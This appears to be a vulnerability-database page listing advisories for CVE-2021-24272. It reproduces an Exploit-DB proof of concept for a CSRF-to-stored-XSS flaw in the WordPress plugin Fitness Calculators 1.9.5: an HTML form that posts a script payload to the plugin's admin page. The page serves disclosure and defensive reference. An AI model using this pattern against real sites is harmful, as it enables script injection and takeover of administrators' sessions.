| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| WordPress Fitness Calculators 1.9.5 Plugin - Cross-Site Request Forgery Vulnerability | 23 Sep 202100:00 | – | zdt | |
| WordPress fitness calculators 跨站请求伪造漏洞 | 5 May 202100:00 | – | cnnvd | |
| CVE-2021-24272 | 5 May 202118:28 | – | cve | |
| CVE-2021-24272 Fitness Calculators < 1.9.6 - Cross-Site Request Forgery to Cross-Site Scripting (XSS) | 5 May 202118:28 | – | cvelist | |
| WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF) | 23 Sep 202100:00 | – | exploitdb | |
| EUVD-2021-11186 | 7 Oct 202500:30 | – | euvd | |
| CVE-2021-24272 | 5 May 202119:15 | – | nvd | |
| CVE-2021-24272 | 5 May 202119:15 | – | osv | |
| WordPress fitness calculators plugin <= 1.9.5 - Cross-Site Request Forgery (CSRF) leading to Cross-Site Scripting (XSS) vulnerability | 14 Apr 202100:00 | – | patchstack | |
| Cross site scripting | 5 May 202119:15 | – | prion |
`# Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)
# Date: 2/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/fitness-calculators/
# Version: 1.9.5
# Tested on: Windows 10
# CVE: CVE-2021-24272
1. Description:
The plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers.
Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue
2. Proof of Concept:
<form method="post" action="https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water">
<input type="text" value="<script>alert(1)</script>" name="fcw[fcw_heading]">
<input type="submit" value="Save" name="submit">
</form>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation